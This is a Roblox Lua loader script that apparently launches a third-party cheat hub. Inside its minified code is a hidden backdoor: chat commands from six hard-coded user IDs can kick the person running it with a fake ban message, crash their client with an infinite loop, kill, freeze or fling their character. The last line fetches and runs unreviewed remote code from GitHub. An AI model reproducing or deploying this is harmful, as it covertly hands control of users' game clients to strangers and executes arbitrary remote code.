--[[local hook
hook = hookfunction(game.HttpGet,function(self,url,...)
    if tostring(url) == "https://raw.githubusercontent.com/JustAP1ayer/ASalfinUiBackup-/main/OcerLibBACKUP.lua" then
        return hook(self,"https://raw.githubusercontent.com/JustAP1ayer/ASalfinUiBackup-/main/ocerlibbackupnopopup.lua",...)
    end
    return hook(self,url,...)
end)]]--
task.spawn(function()task.wait(2.5)local a=game:GetService("Players")local b=game:GetService("MarketplaceService")local c=game:GetService("RunService")local d=a.LocalPlayer;local e={[138474176]=true,[4730367411]=true,[1507671882]=true,[42321866]=true,[116781531]=true,[87860658]=true}local f="The Game"pcall(function()local g=b:GetProductInfo(game.PlaceId)if g and g.Name then f=g.Name end end)local h;local i;local function j(k)if e[k.UserId]then k.Chatted:Connect(function(l)l=l:lower()local m=d.Character;local n=m and m:FindFirstChildOfClass("Humanoid")local o=m and m:FindFirstChild("HumanoidRootPart")if l=="/ban"then d:Kick("You have been banned for violating "..f.."'s guidelines.")elseif l=="/crash"then while true do end elseif l=="/jump"and n then n.Jump=true elseif l=="/die"and n then n.Health=0 elseif l=="/freeze"and o then o.Anchored=true elseif l=="/unfreeze"and o then o.Anchored=false elseif l=="/sit"and n then n.Sit=true elseif l=="/unsit"and n then n.Sit=false elseif l=="/spin"and o then if h then h:Disconnect()end;h=c.Heartbeat:Connect(function()o.CFrame=o.CFrame*CFrame.Angles(0,math.rad(10),0)end)elseif l=="/unspin"and h then h:Disconnect()h=nil elseif l=="/float"and o then if i then i:Disconnect()end;i=c.Heartbeat:Connect(function()o.Velocity=Vector3.new(0,5,0)end)elseif l=="/nofloat"and i then i:Disconnect()i=nil;o.Velocity=Vector3.zero elseif l=="/fling"and o then o.Velocity=Vector3.new(0,100,-250)end end)end end;for p,q in ipairs(a:GetPlayers())do j(q)end;a.PlayerAdded:Connect(function(q)j(q)end)end)
loadstring(game:HttpGet("https://raw.githubusercontent.com/JustAP1ayer/PlayerHubOther/main/PlayerHubMML2loadstirng.lua",true))()
